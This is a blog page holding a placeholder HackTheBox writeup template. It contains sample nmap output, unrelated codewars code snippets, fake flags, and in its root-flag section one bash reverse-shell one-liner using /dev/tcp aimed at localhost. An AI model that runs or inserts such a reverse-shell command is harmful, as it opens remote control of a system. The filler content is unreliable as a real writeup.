<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="HackTheBox - BOX NAME HERE" /><meta name="author" content="Ryan Kozak" /><meta property="og:locale" content="en" /><meta name="description" content="Everything below is just random stuff for the sake of example." /><meta property="og:description" content="Everything below is just random stuff for the sake of example." /><link rel="canonical" href="https://narkopolo.github.io/posts/boxname/" /><meta property="og:url" content="https://narkopolo.github.io/posts/boxname/" /><meta property="og:site_name" content="❯ narkopolo" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-07-31T00:00:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="HackTheBox - BOX NAME HERE" /><meta name="twitter:site" content="@nark0polo" /><meta name="twitter:creator" content="@Ryan Kozak" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Ryan Kozak"},"dateModified":"2022-07-31T07:45:04+02:00","datePublished":"2022-07-31T00:00:00+02:00","description":"Everything below is just random stuff for the sake of example.","headline":"HackTheBox - BOX NAME HERE","mainEntityOfPage":{"@type":"WebPage","@id":"https://narkopolo.github.io/posts/boxname/"},"url":"https://narkopolo.github.io/posts/boxname/"}</script><title>HackTheBox - BOX NAME HERE | ❯ narkopolo</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="❯ narkopolo"><meta name="application-name" content="❯ narkopolo"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="/assets/img/QdS9xRzR_400x400.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">❯ narkopolo</a></div><div class="site-subtitle font-italic">Hacker by heart, CTF player, InfoSec fiddler, Python dev, cypherpunk 💻⛏️ <br><br><a href="https://app.hackthebox.com/users/13267"><img src="https://www.hackthebox.com/badge/image/13267" alt="HTB badge"></a></div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>POSTS</span> </a><li class="nav-item"> <a href="/projects/" class="nav-link"> <i class="fa-fw fas fa-file-code ml-xl-3 mr-xl-3 unloaded"></i> <span>PROJECTS</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>WHOAMI</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/narkopolo" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://app.hackthebox.com/users/13267" aria-label="hackthebox" target="_blank" rel="noopener"> <i class="fa fa-cube"></i> </a> <a href="https://twitter.com/nark0polo" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>HackTheBox - BOX NAME HERE</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>HackTheBox - BOX NAME HERE</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1659218400" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Jul 31, 2022 </em> </span> <span> Updated <em class="" data-ts="1659246304" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Jul 31, 2022 </em> </span><div class="d-flex justify-content-between"> <span> By <em> narkopolo </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="456 words"> <em>2 min</em> read</span></div></div></div><div class="post-content"><p><em>Everything below is just random stuff for the sake of example.</em></p><h1 id="information-gathering">Information Gathering</h1><h2 id="nmap"><span class="mr-2">Nmap</span><a href="#nmap" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>We begin our reconnaissance by running an Nmap scan checking default scripts and testing for vulnerabilities.</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre><span class="gp">x@wartop:~$</span><span class="w"> </span>nmap <span class="nt">-sVC</span> 192.168.100.6
<span class="go">
Starting Nmap 7.01 ( https://nmap.org ) at 2019-08-11 08:57 PDT
Nmap scan report for 192.168.100.6 (192.168.100.1)
Host is up (0.022s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
53/tcp  open  domain
81/tcp  open  http     Apache httpd
|_http-server-header: Apache
444/tcp open  ssl/http Apache httpd
|_http-server-header: Apache
| ssl-cert: Subject: commonName=192.168.100.6
| Not valid before: 2018-07-06T14:40:08
|_Not valid after:  4756-06-01T14:40:08

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.22 seconds
</span></pre></table></code></div></div><p>From the above output we can see that ports, <strong>22</strong>, <strong>53</strong>, <strong>81</strong>, and <strong>444</strong> are the ports open. This is just an example to show code formatting so who cares.</p><p>Look here’s an image of my website, this is how you format an image.</p><p><img data-src="/assets/img/htb-boxname/ryankozak.com.png" alt="My Website" data-proofer-ignore> \ <strong>Figure 1:</strong> My Website</p><p><img data-src="/assets/img/htb-boxname/github.png" alt="Github" data-proofer-ignore> \ <strong>Figure 2:</strong> Github Profile</p><p>Maybe we want to show some python code too, to let’s take a look at a snipped from <a href="https://www.codewars.com">codewars</a> to format time as human readable.</p><div class="language-python highlighter-rouge"><div class="code-header"> <span data-label-text="Python"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">make_readable</span><span class="p">(</span><span class="n">seconds</span><span class="p">):</span>        

    <span class="n">hours</span> <span class="o">=</span> <span class="n">seconds</span> <span class="o">/</span> <span class="mi">60</span><span class="o">**</span><span class="mi">2</span>
    <span class="n">minutes</span> <span class="o">=</span> <span class="n">seconds</span><span class="o">/</span><span class="mi">60</span> <span class="o">-</span> <span class="n">hours</span><span class="o">*</span><span class="mi">60</span>
    <span class="n">seconds</span> <span class="o">=</span> <span class="n">seconds</span> <span class="o">-</span> <span class="n">hours</span><span class="o">*</span><span class="p">(</span><span class="mi">60</span><span class="o">**</span><span class="mi">2</span><span class="p">)</span> <span class="o">-</span> <span class="n">minutes</span><span class="o">*</span><span class="mi">60</span>

    <span class="k">return</span> <span class="s">'%02d:%02d:%02d'</span> <span class="o">%</span> <span class="p">(</span><span class="n">hours</span><span class="p">,</span> <span class="n">minutes</span><span class="p">,</span> <span class="n">seconds</span><span class="p">)</span>
</pre></table></code></div></div><h1 id="exploitation">Exploitation</h1><p>In order to gain our initial foothold we need to blablablabla. Here’s another code snippet just for fun.</p><div class="language-php highlighter-rouge"><div class="code-header"> <span data-label-text="PHP"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre><td class="rouge-code"><pre><span class="k">function</span> <span class="n">sqInRect</span><span class="p">(</span><span class="nv">$lng</span><span class="p">,</span> <span class="nv">$wdth</span><span class="p">)</span> <span class="p">{</span>

    <span class="k">if</span><span class="p">(</span><span class="nv">$lng</span> <span class="o">==</span> <span class="nv">$wdth</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">return</span> <span class="kc">null</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="nv">$squares</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>

    <span class="k">while</span><span class="p">(</span><span class="nv">$lng</span><span class="o">*</span><span class="nv">$wdth</span> <span class="o">&gt;=</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">if</span><span class="p">(</span><span class="nv">$lng</span><span class="o">&gt;</span><span class="nv">$wdth</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$base</span> <span class="o">=</span> <span class="nv">$wdth</span><span class="p">;</span>
        <span class="nv">$lng</span> <span class="o">=</span> <span class="nv">$lng</span> <span class="o">-</span> <span class="nv">$base</span><span class="p">;</span>
      <span class="p">}</span>
      <span class="k">else</span> <span class="p">{</span>
        <span class="nv">$base</span> <span class="o">=</span> <span class="nv">$lng</span><span class="p">;</span>
        <span class="nv">$wdth</span> <span class="o">=</span> <span class="nv">$wdth</span> <span class="o">-</span> <span class="nv">$base</span><span class="p">;</span>
      <span class="p">}</span>
      <span class="nb">array_push</span><span class="p">(</span><span class="nv">$squares</span><span class="p">,</span> <span class="nv">$base</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="nv">$squares</span><span class="p">;</span>
<span class="p">}</span>
</pre></table></code></div></div><p>Above is the php code for the <strong>Rectangle into Squares</strong> kata solution from codewars.</p><h2 id="user-flag"><span class="mr-2">User Flag</span><a href="#user-flag" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>In order to get the user flag, we simply need to use <code class="language-plaintext highlighter-rouge">cat</code>, because this is a template and not a real writeup!</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>x@wartop:~$ cat user.txt
6u6baafnd3d54fc3b47squhp4e2bhk67
</pre></table></code></div></div><h2 id="root-flag"><span class="mr-2">Root Flag</span><a href="#root-flag" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>The privilege escalation for this box was not hard, because this is an example and I’ve got sudo password. Here’s some code to call a reverse shell <code class="language-plaintext highlighter-rouge">bash -i &gt;&amp; /dev/tcp/127.0.0.1/4444 0&gt;&amp;1</code>.</p><p><img data-src="/assets/img/htb-boxname/root.png" alt="Root" data-proofer-ignore> \ <strong>Figure 3:</strong> root.txt v5gw5zkh8rr3vmye7p4ka</p><h1 id="conclusion">Conclusion</h1><p>In the conclusion sections I like to write a little bit about how the box seemed to me overall, where I struggled, and what I learned.</p><h1 id="references">References</h1><ol><li><a href="https://ryankozak.com/how-i-do-my-ctf-writeups/">https://ryankozak.com/how-i-do-my-ctf-writeups/</a><li><a href="https://github.com/Wandmalfarbe/pandoc-latex-template">https://github.com/Wandmalfarbe/pandoc-latex-template</a><li><a href="https://hackthebox.eu">https://hackthebox.eu</a><li><a href="https://forum.hackthebox.eu">https://forum.hackthebox.eu</a></ol></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/writeups/'>writeups</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/hackthebox/" class="post-tag no-text-decoration" >hackthebox</a> <a href="/tags/ctf/" class="post-tag no-text-decoration" >ctf</a> <a href="/tags/writeup/" class="post-tag no-text-decoration" >writeup</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HackTheBox+-+BOX+NAME+HERE+-+%E2%9D%AF+narkopolo&url=https%3A%2F%2Fnarkopolo.github.io%2Fposts%2Fboxname%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox+-+BOX+NAME+HERE+-+%E2%9D%AF+narkopolo&u=https%3A%2F%2Fnarkopolo.github.io%2Fposts%2Fboxname%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fnarkopolo.github.io%2Fposts%2Fboxname%2F&text=HackTheBox+-+BOX+NAME+HERE+-+%E2%9D%AF+narkopolo" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/boxname/">HackTheBox - BOX NAME HERE</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/writeup/">writeup</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div class="post-navigation d-flex justify-content-between"><div class="btn btn-outline-primary disabled" prompt="Older"><p>-</p></div><div class="btn btn-outline-primary disabled" prompt="Newer"><p>-</p></div></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/nark0polo">narkopolo</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a></p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/writeup/">writeup</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
